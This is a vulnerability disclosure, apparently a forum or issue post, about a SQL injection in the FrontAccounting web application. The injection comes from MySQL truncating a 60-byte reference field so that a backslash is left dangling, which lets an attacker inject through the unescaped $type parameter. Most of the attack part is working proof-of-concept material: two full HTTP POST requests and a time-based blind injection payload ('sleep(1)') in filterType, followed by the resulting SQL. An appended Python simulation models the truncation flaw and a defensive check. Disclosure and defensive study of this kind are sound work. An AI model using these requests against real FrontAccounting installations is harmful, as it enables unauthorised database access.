Sorry, this is my first time chatting with people in English.
FrontAccounting uses the function db_escape() to escape values, but some variables are not passed through db_escape().
Environment: docker mattrayner/lamp:latest-1604
0x00 Description
includes/db/class.reflines_db.inc:156
If I set the parameter $reference to something like 'XXXXXX\', the single quote can be escaped, and I can inject through the parameter $type.
includes/references.inc:365
admin/db/voiding_db.inc:127
admin/void_transaction.php:316
admin/void_transaction.php:352
So the parameter $type can be controlled.
What about the parameter $reference?
get_systype_db_info()
After that I found some INSERT statements for the table grn_batch.
purchasing/includes/db/grn_db.inc:170
purchasing/includes/db/grn_db.inc:99
purchasing/po_receive_items.php:254
So the parameter $reference can be controlled.
0x01 Bypass:
PHP
switch ($type)
Here the variable $type with a value like '25' is treated the same as '+25dasdsadasda'.
MySQL
Converting a string to an integer has some quirks in MySQL:
'25' = '25dasdasdasd' = '+25dasdasdasd'
A string and an integer can be added together.
MySQL has the SQL truncation problem, so '\' can be truncated.
0x02 POC:
A setting such as '001/2018\' will report an error, but '001/2018\' will not. I noticed that the reference is 60 bytes, so I set the payload to 61 bytes, like 001100422222222222222222222201700422222222222222212222/2018\\. It is 001100422222222222222222222201700422222222222222212222/2018\ in the database.
I am using po_entry_items.php, not the po_receive_items.php found above.
POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3
supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463
database:
POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0
filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072
The SQL statement that finally executes looks like this:
SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''
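As an added illustration, not part of the original report or of FrontAccounting's code, the following Python simulation shows the two MySQL behaviours the Bypass section relies on: non-strict truncation of an over-width reference that leaves a dangling backslash, and lenient string-to-number comparison against an integer column, next to the strict-mode rejection and the detection check a defender would want. The 60-byte width, the addslashes-style behaviour of db_escape() and the sample values are assumptions.

```python
import re

REFERENCE_WIDTH = 60  # assumed column width; the report states the reference is 60 bytes

def db_escape(value: str) -> str:
    # Assumed addslashes-style escaper: backslash and single quote get a leading backslash.
    return value.replace("\\", "\\\\").replace("'", "\\'")

def mysql_unescape(literal: str) -> str:
    # Resolve the backslash escapes MySQL applies when parsing a quoted literal
    # (only the backslash and quote cases matter for this simulation).
    return re.sub(r"\\(.)", r"\1", literal)

def store_nonstrict(value: str, width: int = REFERENCE_WIDTH) -> str:
    # Non-strict sql_mode: a value wider than the column is silently cut to `width`
    # characters, so a correctly escaped pair of backslashes can lose its second half.
    return mysql_unescape(db_escape(value))[:width]

def store_strict(value: str, width: int = REFERENCE_WIDTH) -> str:
    # STRICT_TRANS_TABLES (or an application-side length check): over-width input is
    # rejected instead of truncated, so a half-escaped value never reaches the table.
    decoded = mysql_unescape(db_escape(value))
    if len(decoded) > width:
        raise ValueError("Data too long for column 'reference'")
    return decoded

def strict_rejects(value: str) -> bool:
    # True when strict storage refuses the value.
    try:
        store_strict(value)
    except ValueError:
        return True
    return False

def has_dangling_backslash(stored: str) -> bool:
    # Detection check for rows already in the table: an odd run of trailing
    # backslashes will escape the closing quote if the value is later interpolated unescaped.
    trailing = len(stored) - len(stored.rstrip("\\"))
    return trailing % 2 == 1

def mysql_string_to_number(s: str) -> float:
    # MySQL compares a string against an INT column as a double: the leading sign and
    # digits are used and the rest of the string is ignored (a warning only).
    m = re.match(r"\s*[+-]?\d+(\.\d+)?", s)
    return float(m.group()) if m else 0.0

if __name__ == "__main__":
    payload = "2" * 59 + "\\\\"  # constructed 61-character reference ending in two backslashes
    stored = store_nonstrict(payload)
    print(len(stored), repr(stored[-3:]), has_dangling_backslash(stored), strict_rejects(payload))
```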